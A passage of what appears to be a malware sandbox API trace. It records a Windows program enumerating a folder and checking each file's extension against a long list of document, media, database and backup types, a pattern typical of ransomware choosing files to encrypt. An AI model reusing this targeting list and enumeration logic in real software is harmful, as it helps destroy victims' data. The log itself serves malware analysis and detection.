[0168.842] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0168.842] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0168.842] FindClose (in: hFindFile=0x8021d8 | out: hFindFile=0x8021d8) returned 1 [0168.842] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0168.842] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0168.842] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0168.842] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032") returned 26 [0168.842] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802098 [0168.843] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.843] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0168.843] lstrlenW (lpString="eula.rtf") returned 8 [0168.843] lstrlenW (lpString=".1cd") returned 4 [0168.843] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.843] lstrlenW (lpString=".3ds") returned 4 [0168.843] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0168.843] lstrlenW (lpString=".3fr") returned 4 [0168.844] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".3g2") returned 4 [0168.844] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".3gp") returned 4 [0168.844] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".7z") returned 3 [0168.844] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.844] lstrlenW (lpString=".accda") returned 6 [0168.844] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0168.844] lstrlenW (lpString=".accdb") returned 6 [0168.844] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0168.844] lstrlenW (lpString=".accdc") returned 6 [0168.844] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0168.844] lstrlenW (lpString=".accde") returned 6 [0168.844] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0168.844] lstrlenW (lpString=".accdt") returned 6 [0168.844] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0168.844] lstrlenW (lpString=".accdw") returned 6 [0168.844] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0168.844] lstrlenW (lpString=".adb") returned 4 [0168.844] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".adp") returned 4 [0168.844] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".ai") returned 3 [0168.844] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0168.844] lstrlenW (lpString=".ai3") returned 4 [0168.844] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".ai4") returned 4 [0168.844] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".ai5") returned 4 [0168.844] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".ai6") returned 4 [0168.844] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0168.844] lstrlenW (lpString=".ai7") returned 4 [0168.845] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".ai8") returned 4 [0168.845] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".anim") returned 5 [0168.845] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0168.845] lstrlenW (lpString=".arw") returned 4 [0168.845] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".as") returned 3 [0168.845] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0168.845] lstrlenW (lpString=".asa") returned 4 [0168.845] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".asc") returned 4 [0168.845] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".ascx") returned 5 [0168.845] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0168.845] lstrlenW (lpString=".asm") returned 4 [0168.845] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".asmx") returned 5 [0168.845] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0168.845] lstrlenW (lpString=".asp") returned 4 [0168.845] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".aspx") returned 5 [0168.845] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0168.845] lstrlenW (lpString=".asr") returned 4 [0168.845] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".asx") returned 4 [0168.845] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".avi") returned 4 [0168.845] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".avs") returned 4 [0168.845] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0168.845] lstrlenW (lpString=".backup") returned 7 [0168.845] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0168.845] lstrlenW (lpString=".bak") returned 4 [0168.846] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".bay") returned 4 [0168.846] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".bd") returned 3 [0168.846] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0168.846] lstrlenW (lpString=".bin") returned 4 [0168.846] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".bmp") returned 4 [0168.846] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".bz2") returned 4 [0168.846] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".c") returned 2 [0168.846] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0168.846] lstrlenW (lpString=".cdr") returned 4 [0168.846] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".cer") returned 4 [0168.846] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".cf") returned 3 [0168.846] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0168.846] lstrlenW (lpString=".cfc") returned 4 [0168.846] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".cfm") returned 4 [0168.846] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".cfml") returned 5 [0168.846] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0168.846] lstrlenW (lpString=".cfu") returned 4 [0168.846] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".chm") returned 4 [0168.846] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".cin") returned 4 [0168.846] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0168.846] lstrlenW (lpString=".class") returned 6 [0168.846] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0168.846] lstrlenW (lpString=".clx") returned 4 [0168.847] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".config") returned 7 [0168.847] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0168.847] lstrlenW (lpString=".cpp") returned 4 [0168.847] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".cr2") returned 4 [0168.847] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".crt") returned 4 [0168.847] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".crw") returned 4 [0168.847] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".cs") returned 3 [0168.847] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0168.847] lstrlenW (lpString=".css") returned 4 [0168.847] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".csv") returned 4 [0168.847] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".cub") returned 4 [0168.847] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".dae") returned 4 [0168.847] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".dat") returned 4 [0168.847] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".db") returned 3 [0168.847] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0168.847] lstrlenW (lpString=".dbf") returned 4 [0168.847] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".dbx") returned 4 [0168.847] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".dc3") returned 4 [0168.847] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".dcm") returned 4 [0168.847] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0168.847] lstrlenW (lpString=".dcr") returned 4 [0168.848] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".der") returned 4 [0168.848] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".dib") returned 4 [0168.848] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".dic") returned 4 [0168.848] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".dif") returned 4 [0168.848] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".divx") returned 5 [0168.848] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0168.848] lstrlenW (lpString=".djvu") returned 5 [0168.848] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0168.848] lstrlenW (lpString=".dng") returned 4 [0168.848] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".doc") returned 4 [0168.848] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".docm") returned 5 [0168.848] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0168.848] lstrlenW (lpString=".docx") returned 5 [0168.848] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.848] lstrlenW (lpString=".dot") returned 4 [0168.848] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".dotm") returned 5 [0168.848] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0168.848] lstrlenW (lpString=".dotx") returned 5 [0168.848] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0168.848] lstrlenW (lpString=".dpx") returned 4 [0168.848] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".dqy") returned 4 [0168.848] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".dsn") returned 4 [0168.848] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0168.848] lstrlenW (lpString=".dt") returned 3 [0168.848] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0168.849] lstrlenW (lpString=".dtd") returned 4 [0168.849] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".dwg") returned 4 [0168.849] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".dwt") returned 4 [0168.849] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".dx") returned 3 [0168.849] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0168.849] lstrlenW (lpString=".dxf") returned 4 [0168.849] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".edml") returned 5 [0168.849] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0168.849] lstrlenW (lpString=".efd") returned 4 [0168.849] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".elf") returned 4 [0168.849] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".emf") returned 4 [0168.849] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".emz") returned 4 [0168.849] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".epf") returned 4 [0168.849] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".eps") returned 4 [0168.849] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".epsf") returned 5 [0168.849] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0168.849] lstrlenW (lpString=".epsp") returned 5 [0168.849] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0168.849] lstrlenW (lpString=".erf") returned 4 [0168.849] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0168.849] lstrlenW (lpString=".exr") returned 4 [0168.849] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".f4v") returned 4 [0168.850] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".fido") returned 5 [0168.850] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0168.850] lstrlenW (lpString=".flm") returned 4 [0168.850] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".flv") returned 4 [0168.850] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".frm") returned 4 [0168.850] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".fxg") returned 4 [0168.850] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".geo") returned 4 [0168.850] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".gif") returned 4 [0168.850] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".grs") returned 4 [0168.850] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".gz") returned 3 [0168.850] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0168.850] lstrlenW (lpString=".h") returned 2 [0168.850] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0168.850] lstrlenW (lpString=".hdr") returned 4 [0168.850] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".hpp") returned 4 [0168.850] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".hta") returned 4 [0168.850] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".htc") returned 4 [0168.850] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".htm") returned 4 [0168.850] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0168.850] lstrlenW (lpString=".html") returned 5 [0168.850] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0168.850] lstrlenW (lpString=".icb") returned 4 [0168.851] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".ics") returned 4 [0168.851] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".iff") returned 4 [0168.851] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".inc") returned 4 [0168.851] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".indd") returned 5 [0168.851] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0168.851] lstrlenW (lpString=".ini") returned 4 [0168.851] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".iqy") returned 4 [0168.851] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".j2c") returned 4 [0168.851] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".j2k") returned 4 [0168.851] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".java") returned 5 [0168.851] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0168.851] lstrlenW (lpString=".jp2") returned 4 [0168.851] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".jpc") returned 4 [0168.851] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".jpe") returned 4 [0168.851] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".jpeg") returned 5 [0168.851] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0168.851] lstrlenW (lpString=".jpf") returned 4 [0168.851] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".jpg") returned 4 [0168.851] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".jpx") returned 4 [0168.851] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0168.851] lstrlenW (lpString=".js") returned 3 [0168.851] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0168.852] lstrlenW (lpString=".jsf") returned 4 [0168.852] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".json") returned 5 [0168.852] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0168.852] lstrlenW (lpString=".jsp") returned 4 [0168.852] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".kdc") returned 4 [0168.852] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".kmz") returned 4 [0168.852] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".kwm") returned 4 [0168.852] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".lasso") returned 6 [0168.852] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0168.852] lstrlenW (lpString=".lbi") returned 4 [0168.852] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".lgf") returned 4 [0168.852] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".lgp") returned 4 [0168.852] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".log") returned 4 [0168.852] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".m1v") returned 4 [0168.852] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".m4a") returned 4 [0168.852] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".m4v") returned 4 [0168.852] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".max") returned 4 [0168.852] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0168.852] lstrlenW (lpString=".md") returned 3 [0168.852] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0168.852] lstrlenW (lpString=".mda") returned 4 [0168.852] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mdb") returned 4 [0168.853] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mde") returned 4 [0168.853] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mdf") returned 4 [0168.853] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mdw") returned 4 [0168.853] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mef") returned 4 [0168.853] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mft") returned 4 [0168.853] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mfw") returned 4 [0168.853] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0168.853] lstrlenW (lpString=".mht") returned 4 [0168.853] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0169.078] lstrlenW (lpString=".mhtml") returned 6 [0169.078] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0169.078] lstrlenW (lpString=".mka") returned 4 [0169.078] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0169.078] lstrlenW (lpString=".mkidx") returned 6 [0169.078] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0169.078] lstrlenW (lpString=".mkv") returned 4 [0169.078] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0169.078] lstrlenW (lpString=".mos") returned 4 [0169.078] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0169.078] lstrlenW (lpString=".mov") returned 4 [0169.078] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0169.078] lstrlenW (lpString=".mp3") returned 4 [0169.078] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0169.078] lstrlenW (lpString=".mp4") returned 4 [0169.079] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".mpeg") returned 5 [0169.079] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0169.079] lstrlenW (lpString=".mpg") returned 4 [0169.079] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".mpv") returned 4 [0169.079] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".mrw") returned 4 [0169.079] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".msg") returned 4 [0169.079] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".mxl") returned 4 [0169.079] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".myd") returned 4 [0169.079] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".myi") returned 4 [0169.079] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".nef") returned 4 [0169.079] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".nrw") returned 4 [0169.079] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".obj") returned 4 [0169.079] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".odb") returned 4 [0169.079] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".odc") returned 4 [0169.079] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0169.079] lstrlenW (lpString=".odm") returned 4 [0169.080] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".odp") returned 4 [0169.080] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".ods") returned 4 [0169.080] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".oft") returned 4 [0169.080] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".one") returned 4 [0169.080] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".onepkg") returned 7 [0169.080] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0169.080] lstrlenW (lpString=".onetoc2") returned 8 [0169.080] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0169.080] lstrlenW (lpString=".opt") returned 4 [0169.080] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".oqy") returned 4 [0169.080] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".orf") returned 4 [0169.080] lstrcmpiW 